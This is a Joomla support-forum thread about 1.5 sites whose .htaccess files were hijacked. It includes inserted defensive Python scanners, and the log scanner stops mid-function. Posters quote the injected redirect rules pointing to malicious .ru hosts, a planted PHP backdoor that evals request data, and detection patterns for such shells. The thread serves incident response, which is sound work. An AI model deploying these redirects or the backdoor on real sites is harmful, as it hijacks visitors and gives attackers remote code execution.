All 1.5 sites redirect to Google...Possible 1.5 sites hacked

crazydiver
Joomla! Explorer
Posts: 377
Joined: Wed May 30, 2007 7:55 am

All 1.5 sites redirect to Google...Possible 1.5 sites hacked

Post by crazydiver » Mon Sep 10, 2012 12:37 am

Hello,

It seems that all my 1.5.26 sites are redirecting to Google from Google.

If I access the website directly by typing the domain into my browser, it's good to go. However, if I do a Google search and click on the website, which ranks high, it gets redirected to Google, causing the user to not see the webpage at all.

I checked my .htaccess and wow... there is some malicious code. Check this out! If possible, maybe the moderators can hide this code so that other hackers will not continue to find another way around it.

Code:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|sharelook|sucharchiv|suchbiene|suchmaschine|infospace)\.(.*)
RewriteRule ^(.*)$ http://invoicingcake.ru/VEREIN?8 [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche||claymont|clickz|clush|ehow|findhow|icq|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://invoicingcake.ru/VEREIN?8 [R=301,L]
</IfModule>
This is only affecting my 1.5 sites. My question is: how do I protect myself from future attacks? Please advise. Thank you.

Here is the entire .htaccess file... It looks wrong.

Code:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtubvista|msnsuchnase|biene|suchmaschine|infospace)\.(.*)
RewriteRule ^(.*)$ http://invoicingcake.ru/VEREIN?8 [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|how|icq|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://invoicingcake .ru/VEREIN?8 [R=301,L]
</IfModule>

##
# @version $Id: htaccess.txt 21064 2011-04-03 22:12:19Z dextercowley $
# @package Joomla
# @copyright Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
# @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
# Joomla! is Free Software
##
#####################################################
#  READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE
#
# The line just below this section: 'Options +FollowSymLinks' may cause problems
# with some server configurations.  It is required for use of mod_rewrite, but may already
# be set by your server administrator in a way that dissallows changing it in
# your .htaccess file.  If using it causes your server to error out, comment it out (add # to
# beginning of line), reload your site in your browser and test your sef url's.  If they work,
# it has been set by your server administrator and you do not need it set here.
#
#####################################################

##  Can be commented out if causes errors, see notes above.
Options +FollowSymLinks

#
#  mod_rewrite in use

RewriteEngine On

########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
## Deny access to extension xml files (uncomment out to activate)
#<Files ~ "\.xml$">
#Order allow,deny
#Deny from all
#Satisfy all
#</Files>
## End of deny access to extension xml files
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode data within the URL
RewriteCond %{QUERY_STRING} base64_encode[^(]*\([^)]*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Return 403 Forbidden header and show the content of the root homepage
RewriteRule .* index.php [F]
#
########## End - Rewrite rules to block out some common exploits
########## Begin - Custom redirects
#
# If you need to redirect some pages, or set a canonical non-www to
# www redirect (or vice versa), place that code here. Ensure those
# redirects use the correct RewriteRule syntax and the [R=301,L] flags.
#
########## End - Custom redirects
#  Uncomment following line if your webserver's URL
#  is not directly related to physical file paths.
#  Update Your Joomla! Directory (just / for root)

# RewriteBase /
########## Begin - Joomla! core SEF Section
#
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
#
# If the requested path and file is not /index.php and the request
# has not already been internally rewritten to the index.php script
RewriteCond %{REQUEST_URI} !^/index\.php
# and the request is for root, or for an extensionless URL, or the
# requested URL ends with one of the listed extensions
RewriteCond %{REQUEST_URI} (/[^.]*|\.(php|html?|feed|pdf|raw))$ [NC]
# and the requested path and file doesn't directly match a physical file
RewriteCond %{REQUEST_FILENAME} !-f
# and the requested path and file doesn't directly match a physical folder
RewriteCond %{REQUEST_FILENAME} !-d
# internally rewrite the request to the index.php script
RewriteRule .* index.php [L]
#
########## End - Joomla! core SEF Section
AddHandler x-httpd-php5.3 .php .phps
ErrorDocument 500 http://invoicingcake .ru/VEREIN?8
ErrorDocument 404 http://invoicingcake .ru/VEREIN?8

Last edited by mandville on Mon Sep 10, 2012 5:50 am, edited 2 times in total.
Reason: reformatted, trimmed code, broke links to malicious sites

euoceo
Joomla! Guru
Posts: 955
Joined: Fri Sep 12, 2008 2:48 pm
Location: Sacramento
Contact:

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by euoceo » Mon Sep 10, 2012 12:58 am

What version of 1.5 are you running? Run the Forum Post Assistant as well and post the results. When you say all 1.5 sites, you of course mean all of yours; how many are you talking about? Are all the sites owned by one user? If so, one site gets hacked due to any number of reasons, a bad module, etc., and all your sites will be hacked if running under one user, so you can't necessarily say this is a 1.5 issue.

And yeah, that .htaccess is not the stock htaccess.txt file. You could start by replacing that to at least maybe get things temporarily working while you clean up the site before it's hacked again.
Joomla! Web Hosting, Design, and Consulting.
Portfolio: http://www.calweb.com/joomla
Please do not PM me for help, use the forums first.

crazydiver
Joomla! Explorer
Posts: 377
Joined: Wed May 30, 2007 7:55 am

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by crazydiver » Mon Sep 10, 2012 1:08 am

Hello,

Thank you so much for your reply.
I am using 1.5.26.

And my apologies for not being clear that it's all my 1.5 sites. I am suspecting 1.5 because all my new 2.5 sites are okay.

About 13 Joomla 1.5.26 sites have had their .htaccess files whacked. Please note it's not all of them.

I will take your advice to get the original .htaccess.

Please standby for the FPA reports.

crazydiver
Joomla! Explorer
Posts: 377
Joined: Wed May 30, 2007 7:55 am

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by crazydiver » Mon Sep 10, 2012 1:20 am

Hello again,

I would like to send my FPA to any moderators who would like to see it... Please let me know who to PM.

euoceo
Joomla! Guru
Posts: 955
Joined: Fri Sep 12, 2008 2:48 pm
Location: Sacramento
Contact:

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by euoceo » Mon Sep 10, 2012 2:06 am

just post here.
Joomla! Web Hosting, Design, and Consulting.
Portfolio: http://www.calweb.com/joomla
Please do not PM me for help, use the forums first.

crazydiver
Joomla! Explorer
Posts: 377
Joined: Wed May 30, 2007 7:55 am

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by crazydiver » Mon Sep 10, 2012 2:17 am

It's a screenshot... is that okay? Or is there another way to post it (copy and paste?)

euoceo
Joomla! Guru
Posts: 955
Joined: Fri Sep 12, 2008 2:48 pm
Location: Sacramento
Contact:

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by euoceo » Mon Sep 10, 2012 2:31 am

If you ran forum post assistant, there's an option to create a copy/paste post...
Joomla! Web Hosting, Design, and Consulting.
Portfolio: http://www.calweb.com/joomla
Please do not PM me for help, use the forums first.

crazydiver
Joomla! Explorer
Posts: 377
Joined: Wed May 30, 2007 7:55 am

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by crazydiver » Mon Sep 10, 2012 2:43 am

Hello,

Thank you for the reply, but I don't see that option.

Please advise.

crazydiver
Joomla! Explorer
Posts: 377
Joined: Wed May 30, 2007 7:55 am

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by crazydiver » Mon Sep 10, 2012 3:19 am

Hello I need help here. I still can't find that option to copy and paste.

It seems that even if I upload an untainted backup, within 30 minutes the site is hacked again. Is there an extension that can prevent the .htaccess from being hacked?

The permissions for the .htaccess file were at 644. I changed them to 444.

crazydiver
Joomla! Explorer
Posts: 377
Joined: Wed May 30, 2007 7:55 am

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by crazydiver » Mon Sep 10, 2012 4:37 am

That is what I'm trying to find out. The .htaccess redirects to these links (don't click, of course):

Code:

http://adminsown .ru/VEREIN?8
http://invoicingcake .ru/VEREIN?8
Any advice and tips here would be really appreciated!
Last edited by mandville on Mon Sep 10, 2012 5:54 am, edited 1 time in total.
Reason: broke link

euoceo
Joomla! Guru
Posts: 955
Joined: Fri Sep 12, 2008 2:48 pm
Location: Sacramento
Contact:

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by euoceo » Mon Sep 10, 2012 4:56 am

Please follow the instructions here: http://docs.joomla.org/Security_Checklist_7
Joomla! Web Hosting, Design, and Consulting.
Portfolio: http://www.calweb.com/joomla
Please do not PM me for help, use the forums first.

mandville
Joomla! Master
Posts: 14791
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by mandville » Mon Sep 10, 2012 5:58 am

Very detailed instructions to run the FPA, complete with screenshots, are at http://forum.joomla.org/viewtopic.php?f=432&t=586336
The adminsown URL was not in the .htaccess that you posted, so where did that come from?
A full discussion on this hack subject is at http://forum.joomla.org/viewtopic.php?f=432&t=705216
HU2HY- Poor questions = Poor answer
Unrequested help PMs will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

crazydiver
Joomla! Explorer
Posts: 377
Joined: Wed May 30, 2007 7:55 am

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by crazydiver » Mon Sep 10, 2012 6:08 am

mandville... thank you for the link.

Here it is...
Problem Description :: Forum Post Assistant (v1.2.2) : 10th September 2012 wrote:
.htaccess hack, gets redirected to malware site
Actions Taken To Resolve by Forum Post Assistant (v1.2.2) 10th September 2012 wrote:
upload backup... however, site gets hijacked within 30 minutes
Forum Post Assistant (v1.2.2) : 10th September 2012 wrote:
Basic Environment :: wrote:
Joomla! Instance :: Joomla! 1.5.26-Stable (senu takaa ama busani) 27-March-2012
Joomla! Configured :: Yes | Writable (644) | Owner: memyself (uid: 20410/gid: 1000) | Group: members (gid: 1000) | Valid For: 1.5
Configuration Options :: Offline: 0 | SEF: 1 | SEF Suffix: 0 | SEF ReWrite: 1 | .htaccess/web.config: Yes | GZip: 1 | Cache: 0 | FTP Layer: 0 | SSL: 0 | Error Reporting: -1 | Site Debug: 0 | Language Debug: 0 | Database Credentials Present: Yes

Host Configuration :: OS: Linux | OS Version: 2.6.18-308.4.1.el5PAE | Technology: i686 | Web Server: Apache | Encoding: gzip,deflate,sdch | Doc Root: /home/mysite/mysite.com/public_html | System TMP Writable: Yes

PHP Configuration :: Version: 5.3.3 | PHP API: cgi-fcgi | Session Path Writable: Unknown | Display Errors: | Error Reporting: 22519 | Log Errors To: | Last Known Error: | Register Globals: 0 | Magic Quotes: 1 | Safe Mode: 0 | Open Base: | Uploads: 1 | Max. Upload Size: 2M | Max. POST Size: 8M | Max. Input Time: -1 | Max. Execution Time: 30 | Memory Limit: 64M

MySQL Configuration :: Version: 5.0.77 (Client:5.0.77) | Host: --protected-- (--protected--) | Collation: utf8_general_ci (Character Set: utf8) | Database Size: 2.01 MiB | #of _FPA_TABLE: 54
Detailed Environment :: wrote:
PHP Extensions :: Core (5.3.3) | date (5.3.3) | ereg () | libxml () | openssl () | pcre () | zlib (1.1) | bz2 () | calendar () | ctype () | hash (1.0) | filter (0.11.0) | ftp () | gettext () | gmp () | session () | iconv () | pcntl () | Reflection ($Revision: 300393 $) | standard (5.3.3) | shmop () | SPL (0.2) | SimpleXML (0.1) | sockets () | exif (1.4 $Id: exif.c 293036 2010-01-03 09:23:27Z sebastian $) | tokenizer (0.1) | xml () | cgi-fcgi () | bcmath () | curl () | dba () | dom (20031129) | fileinfo (1.0.5-dev) | gd () | imap () | json (1.2.1) | ldap () | mbstring () | mcrypt () | mysql (1.0) | mysqli (0.1) | odbc (1.0) | PDO (1.0.4dev) | pdo_mysql (1.0.2) | PDO_ODBC (1.0.1) | pdo_pgsql (1.0.2) | pdo_sqlite (1.0.1) | pgsql () | Phar (2.0.1) | posix () | pspell () | snmp () | soap () | SQLite (2.0-dev) | sqlite3 (0.7-dev) | sysvmsg () | sysvsem () | sysvshm () | wddx () | xmlreader (0.1) | xmlrpc (0.51) | xmlwriter (0.1) | xsl (0.1) | zip (1.9.1) | Zend Engine (2.3.0) |
Potential Missing Extensions :: suhosin |

Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: Yes | PHP SU: Yes | Custom SU (LiteSpeed/Cloud/Grid): Yes
Potential Ownership Issues: No
Folder Permissions :: wrote:
Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |

Elevated Permissions (First 10) :: None
Extensions Discovered :: wrote:
Components :: SITE :: Wrapper (1.5.0) | Gantry (3.0.12) | WF_AGGREGATOR_VIMEO_TITLE (2.0.21) | WF_AGGREGATOR_[youtube]_TITLE (2.0.21) | WF_POPUPS_JCEMEDIABOX_TITLE (2.0.21) | WF_POPUPS_WINDOW_TITLE (2.0.21) | WF_MEDIAPLAYER_JCEPLAYER_TITLE (2.0.21) | WF_LINKS_JOOMLALINKS_TITLE (2.0.21) | WF_FILESYSTEM_JOOMLA_TITLE (2.0.21) | WF_PREVIEW_TITLE (2.0.21) | WF_PASTE_TITLE (2.0.21) | WF_NONBREAKING_TITLE (2.0.21) | WF_BROWSER_TITLE (2.0.21) | WF_VISUALCHARS_TITLE (2.0.21) | WF_LAYER_TITLE (2.0.21) | WF_SEARCHREPLACE_TITLE (2.0.21) | WF_TABLE_TITLE (2.0.21) | WF_FULLSCREEN_TITLE (2.0.21) | WF_CONTEXTMENU_TITLE (2.0.21) | WF_PRINT_TITLE (2.0.21) | WF_SPELLCHECKER_TITLE (2.0.21) | WF_MEDIA_TITLE (2.0.21) | WF_INLINEPOPUPS_TITLE (2.0.21) | WF_STYLE_TITLE (2.0.21) | WF_IMGMANAGER_TITLE (2.0.21) | WF_LINK_TITLE (2.0.21) | WF_XHTMLXTRAS_TITLE (2.0.21) | WF_AUTOSAVE_TITLE (2.0.21) | WF_ARTICLE_TITLE (2.0.21) | WF_CLEANUP_TITLE (2.0.21) | WF_DIRECTIONALITY_TITLE (2.0.21) | WF_TEXTCASE_TITLE (2.0.21) | WF_SOURCE_TITLE (2.0.21) | MailTo (1.5.0) | User (1.5.0) |
Components :: ADMIN :: Frontpage (1.5.0) | RokCandy Bundle (1.3) | Plugin Manager (1.5.0) | Cache Manager (1.5.0) | RokNavMenu Bundle (2.1) | Messaging (1.5.0) | Menus Manager (1.5.0) | Joom!Fish (2.0.4) | Akeeba (3.4.3) | Trash (1.0.0) | Weblinks (1.5.0) | Gantry (3.1.20) | Unknown (-) | JCE (2.0.21) | Editor - JCE (2.0.21) | Search (1.5.0) | RokCandy (1.3) | Newsfeeds (1.5.0) | Media Manager (1.5.0) | RokModule (1.2) | Language Manager (1.5.0) | Polls (1.5.0) | Module Manager (1.5.0) | User Manager (1.5.0) | Xmap (1.2.10) | lknAnswers Plugin (1.5.0) | Remository Plugin (1.0.3) | Web Links Plugin (1.5.1) | Rokdownloads Plugin (1.0.4) | Eventlist Plugin (1.0.0) | KnowledgeBase Plugin (1.0.0) | MyBlog Plugin (1.5.1) | AcyMailing Plugin (1.0.0) | Contacts Plugin (1.0.1) | Content Plugin (1.5.1) | DOCman Plugin (1.5.0) | JCALPro Plugin (1.0.0) | SectionEx Plugin (1.0.2) | Gallery2 Bridge Plugin (1.0.2) | Agora Plugin (1.0.0) | Glossary Plugin (1.5.1) | Rapid Recipe Plugin (1.0.0) | CMS Shop Builder Plugin (1.5.0) | RSGallery2 Extension (1.0.0) | Jomres Plugin (1.0) | Virtuemart Plugin (1.1.4) | JEvents Plugin (1.0.3) | RD-Autos Plugin (1.5.0) | Kunena Plugin (1.0.1) | SOBI2 Plugin (1.5.1) | JMovies Plugin (1.5.0) | JoomDOC Extension (1.0.0) | JDownloads Plugin (1.5.1) | Hot Property Plugin (1.0.1) | JoomSuite Resources Plugin (1.0.0) | Mosets Tree Plugin (1.0.1) | JoomGallery Plugin (1.5.1) | Configuration Manager (1.5.0) | Template Manager (1.5.0) | Content Page (1.5.0) | Frontend User Article List (2.0b) | Control Panel (1.5.0) | QContacts (1.0.6) | Mass Mail (1.5.0) | Contact Items (1.0.0) | Banners (1.5.0) | jsecure (2.1.7) | Installation Manager (1.5.0) |

Modules :: SITE :: Search (1.0.0) | Show IP (1.2) | Statistics (1.5.0) | Poll (1.5.0) | RokTabs (1.15) | Archived Content (1.5.0) | Syndicate (1.5.0) | Breadcrumbs (1.5.0) | Random Image (1.5.0) | Wrapper (1.0.0) | Login (1.5.0) | Sections (1.5.0) | JoomFish-Language Selection (2.0.4) | Newsflash (1.5.0) | Latest News (1.5.0) | RokStories (1.9) | Custom HTML (1.5.0) | Banner (1.5.0) | RokAjaxSearch (2.0) | RokNewsPager (1.7) | Who\'s Online (1.0.0) | Footer (1.5.0) | Menu (1.5.0) | Feed Display (1.5.0) | Most Read Content (1.5.0) | Related Items (1.0.0) | RokNavMenu (2.1) |
Modules :: ADMIN :: Items Stats (1.0.0) | Unread Items (1.0.0) | Title (1.0.0) | Quick Icons (1.0.0) | Direct Translation (2.0.4) | Login Form (1.0.0) | Popular Items (1.0.0) | Latest News (1.0.0) | Online Users (1.0.0) | Toolbar (1.0.0) | Logged in Users (1.0.0) | Custom HTML (1.5.0) | Akeeba Backup Notification Mod (3.4.3) | Admin Menu (1.0.0) | Admin Submenu (1.0.0) | Footer (1.0.0) | User Status (1.5.0) | Feed Display (1.5.0) |

Plugins :: SITE :: Joomfish - Missing Translation (2.0.4) | System - jSecure Authenticatio (2.1.7) | System - Canonicalization (-) | System - Mootools Upgrade (1.5) | System - Remember Me (1.5) | System - RokGantry Cache (1.0) | System - jFinalizer (1.1.5) | System - RokBox (2.4) | System - Log (1.5) | System - RokGZipper (1.9) | System - Backlinks (1.5) | System - Cache (1.5) | System - CssJsCompress (3.5) | Akeeba Backup Lazy Scheduling (3.3) | Joomfish - Basic Router (2.0.4) | System - SEF (1.5) | System - Ban IP Address (-) | System - RokCandy (1.3) | Joomfish - Abstraction Layer (2.0.4) | System - Legacy (1.5) | System - Debug (1.5) | Search - Content (1.5) | Search - Weblinks (1.5) | Search - Newsfeeds (1.5) | Search - Joomfish Sections (2.0.4) | Search - Joomfish Weblinks (2.0.4) | Search - Categories (1.5) | Search - Contacts (1.5) | Search - Sections (1.5) | Search - Joomfish Categories (2.0.4) | Search - Joomfish Contacts (2.0.4) | Search - Joomfish Newsfeeds (2.0.4) | Search - Joomfish Content (2.0.4) | Authentication - OpenID (1.5) | Authentication - Example (1.5) | Authentication - LDAP (1.5) | Authentication - GMail (1.5) | Authentication - Joomla (1.5) | RokNavMenu - Extended Link (2.1) | RokNavMenu - Boost (2.1) | User - Example (1.0) | User - Joomla! (1.5) | Button - Readmore (1.5) | Button - RokCandy (1.3) | Button - Image (1.0.0) | Button - Pagebreak (1.5) | Advanced Code Editor (1.5.7.5) | Paste (1.5.7.5) | Paste (1.5.7.5) | File Browser (1.5.7.5) | Joomla! Links for Advanced Lin (1.2.1) | Advanced Link (1.5.7.5) | JCE SPELLCHECKER TITLE (1.5.7.5) | Media Object support (1.5.7.5) | Image Manager (1.5.7.5) | Editor - JCE (2.0.21) | Editor - TinyMCE 3 (3.2.6) | Editor - XStandard Lite for Jo (1.0) | Editor - RokPad (1.7) | Content - Page Navigation (1.5) | Content - Example (1.0) | Content - RokBox (1.6) | Content - Code Highlighter (Ge (1.5) | Content - Load Modules (1.5) | Content - Email Cloaking (1.5) | Content - Image gallery - sigp (1.3.1.6) | Joomfish Alternative Language (2.0.4) | Content - Vote (1.5) | Content - Pagebreak (1.5) | XML-RPC - Blogger API (1.0) | XML-RPC - Joomla API (1.0) | XML-RPC - MovableType API (2.3.4) |
Templates Discovered :: wrote:
Templates :: SITE :: rt_juxta_j15 (1.5.3) |
Templates :: ADMIN :: Khepri (1.0) |

crazydiver
Joomla! Explorer
Posts: 377
Joined: Wed May 30, 2007 7:55 am

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by crazydiver » Mon Sep 10, 2012 8:04 am

Hello,

Just curious, but is there a problem with the FPA list I pasted?

I have tried upgrading all the extensions, but it seems that the .htaccess gets hacked into every 30 minutes to an hour. Changing the .htaccess back to the original helps, but there is a backdoor somewhere that is controlling the .htaccess file.

I'm looking for it but can't find any.

If there is anyone who knows how to block access to the .htaccess, please let me know.

Thank you.

carloferrari
Joomla! Fledgling
Posts: 2
Joined: Thu Sep 28, 2006 1:13 pm

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by carloferrari » Mon Sep 10, 2012 8:31 am

I got the same problem today with a 1.5 Joomla web site. I found the .htaccess file in the root of all infected sites.

dracon
Joomla! Fledgling
Posts: 4
Joined: Thu Nov 05, 2009 10:18 pm

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by dracon » Mon Sep 10, 2012 9:51 am

We get the same problem.
Check your images/stories folder as well. There could be 2 PHP files there (story.php, cache_cjcccq.php).

story.php has following code inside:

Code:

GIF89a1
<?php
if (isset($_REQUEST['p1'])) {
	eval(stripslashes($_REQUEST['p1']));
} else {
	echo "djeu84m";
}
?>
cache_cjcccq.php is the class JToolBarHelper...

maybe modified. Didn't check this for now.

In cPanel there is an error.log that shows a long list:

[10-Sep-2012 05:14:54 UTC] PHP Warning: Module 'pdo_mysql' already loaded in Unknown on line 0
[10-Sep-2012 05:14:54 UTC] PHP Warning: Module 'PDO' already loaded in Unknown on line 0
It is never too late to start something new!
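A defender's file scanner for the kind of drop described above (a script in an image folder, an image header glued to PHP, eval() of request data), added here as an example and not code from this thread or from Joomla. The sample files are constructed: story.php is modelled on the one quoted above, and the hidden .lib_tcxahx.php name is taken from the access-log excerpt later in this thread; the directory names are the usual Joomla upload folders.

```python
import os
import re
import tempfile

# Constructed sample modelled on the story.php quoted above: an image magic header
# followed by PHP that eval()s request data. Built here, not read from any real site.
SAMPLE_STORY_PHP = (
    b"GIF89a1\n<?php\n"
    b"if (isset($_REQUEST['p1'])) {\n"
    b"\teval(stripslashes($_REQUEST['p1']));\n"
    b"} else {\n\techo \"djeu84m\";\n}\n?>\n"
)
SAMPLE_BENIGN_PHP = b"<?php\necho 'hello';\n"   # constructed; nothing suspicious in content
SAMPLE_GIF = b"GIF89a\x01\x00\x01\x00"             # constructed; a plain image header

IMAGE_MAGIC = (b"GIF87a", b"GIF89a", b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff")
PHP_OPEN = re.compile(rb"<\?php|<\?=")
# A code-execution function whose argument is built from user-controlled input.
EVAL_OF_INPUT = re.compile(
    rb"\b(eval|assert|system|passthru|shell_exec|preg_replace)\s*\([^;]*\$_(REQUEST|POST|GET|COOKIE)\b"
)
SCRIPT_EXT = {".php", ".phtml", ".php5", ".phps", ".pl", ".py", ".cgi"}


def classify_file(path):
    """Return the indicator names that apply to one file (empty list = nothing found)."""
    with open(path, "rb") as fh:
        data = fh.read(65536)          # headers and small shells fit in the first 64 KiB
    hits = []
    if os.path.splitext(path)[1].lower() in SCRIPT_EXT:
        hits.append("script-in-upload-dir")
    if os.path.basename(path).startswith("."):
        hits.append("hidden-file")
    if data.startswith(IMAGE_MAGIC) and PHP_OPEN.search(data):
        hits.append("image-php-polyglot")
    if EVAL_OF_INPUT.search(data):
        hits.append("eval-of-request-data")
    return hits


def scan_upload_dirs(root, subdirs=("images", "media", "tmp", "cache")):
    """Walk the directories that should hold only static content and return
    {relative_path: [indicators]} for every file that triggers at least one."""
    findings = {}
    for sub in subdirs:
        for dirpath, _, files in os.walk(os.path.join(root, sub)):
            for name in files:
                full = os.path.join(dirpath, name)
                hits = classify_file(full)
                if hits:
                    findings[os.path.relpath(full, root).replace(os.sep, "/")] = hits
    return findings


def demo():
    """Build a throwaway site tree with the constructed samples and scan it."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "images", "stories"))
    os.makedirs(os.path.join(root, "images", "banners"))
    with open(os.path.join(root, "images", "stories", "story.php"), "wb") as fh:
        fh.write(SAMPLE_STORY_PHP)
    with open(os.path.join(root, "images", "stories", "logo.gif"), "wb") as fh:
        fh.write(SAMPLE_GIF)
    # hidden script named like the one in the access-log excerpt later in this thread
    with open(os.path.join(root, "images", "banners", ".lib_tcxahx.php"), "wb") as fh:
        fh.write(SAMPLE_BENIGN_PHP)
    return scan_upload_dirs(root)


if __name__ == "__main__":
    for path, hits in demo().items():
        print(path, "->", ", ".join(hits))
```

Any hit is a reason to pull the file for review rather than delete it on the spot, since a copy of the dropped file is evidence of how and when the site was entered.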

carloferrari
Joomla! Fledgling
Posts: 2
Joined: Thu Sep 28, 2006 1:13 pm

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by carloferrari » Mon Sep 10, 2012 10:47 am

Every time we delete the .htaccess file after few minutes the file appears again.

siongraham
Joomla! Fledgling
Posts: 4
Joined: Thu May 29, 2008 12:00 pm

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by siongraham » Mon Sep 10, 2012 1:56 pm

If it's any help to anyone, I've taken the following steps and found the .htaccess file is no longer being infected:
  • Restore your /home/mydomain/public_html/.htaccess file,
  • Set permissions to 444,
  • Set owner to root,
  • Create an empty file in /home/mydomain/.htaccess, as this was also being created with the suspect code. Again this is owned by root with 444 permissions.
Looking at the logs I can see a suspicious file being accessed by an address in Poland:

Code:

192.166.219.91 - - [10/Sep/2012:10:15:31 +0100] "POST /images/banners/.lib_tcxahx.php HTTP/1.1" 200 547 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
192.166.219.91 - - [10/Sep/2012:10:15:35 +0100] "POST /images/banners/.lib_tcxahx.php HTTP/1.1" 500 432 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
192.166.219.91 - - [10/Sep/2012:11:17:03 +0100] "POST /images/banners/.lib_tcxahx.php HTTP/1.1" 200 547 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
192.166.219.91 - - [10/Sep/2012:11:17:06 +0100] "POST /images/banners/.lib_tcxahx.php HTTP/1.1" 500 472 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
I therefore modified the /home/mydomain/.htaccess file to contain the following:

Code:

RedirectMatch 404 /\..*$
This I hope will prevent Apache from serving hidden files. I then deleted the files. Note that in my case the file was always called /images/banners/.lib_XXXXXX.php, where XXXXXX varied from site to site. I had three sites infected out of about 60, all running Joomla 1.5.25.

This doesn't tackle the root cause of the problem, but my customers are crying out loud to get their sites restored. I suspect the problem will return somehow until we know what the problem is.

I'm not suggesting you should copy my actions and forget about the problem. But I've been waiting for a couple of hours and have not had the problem come back.
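The log pattern in the post above (POST requests, no referer, to a dotfile script under /images/) is easy to pull out of an Apache combined log automatically. This is an added example, not code from the thread: the parser and the rules are mine, the sample lines are constructed (the 192.166.219.91 entries mirror the excerpt above; 203.0.113.7 and 198.51.100.9 are documentation addresses standing in for ordinary visitors).

```python
import re
from collections import defaultdict

# Constructed log lines modelled on the access-log excerpt in the post above
# (Apache combined format). Only the first two mirror the real excerpt.
SAMPLE_LOG = """\
192.166.219.91 - - [10/Sep/2012:10:15:31 +0100] "POST /images/banners/.lib_tcxahx.php HTTP/1.1" 200 547 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
192.166.219.91 - - [10/Sep/2012:10:15:35 +0100] "POST /images/banners/.lib_tcxahx.php HTTP/1.1" 500 432 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
203.0.113.7 - - [10/Sep/2012:10:16:02 +0100] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 8120 "http://www.google.com/search?q=example" "Mozilla/5.0"
203.0.113.7 - - [10/Sep/2012:10:16:03 +0100] "GET /images/stories/logo.gif HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Sep/2012:10:20:44 +0100] "POST /images/stories/story.php HTTP/1.1" 200 547 "-" "curl/7.21.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# Directories that should serve static content only.
UPLOAD_DIRS = ("/images/", "/media/", "/tmp/", "/cache/", "/logs/")
SCRIPT_RE = re.compile(r"\.(php\d?|phtml|pl|py|cgi|sh)$", re.I)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def reasons_for(rec):
    """Return why a request looks like webshell traffic (empty list = normal)."""
    path = rec["path"].split("?", 1)[0]
    reasons = []
    if path.startswith(UPLOAD_DIRS) and SCRIPT_RE.search(path):
        reasons.append("script executed under upload dir")
    if "/." in path:
        reasons.append("dotfile requested")
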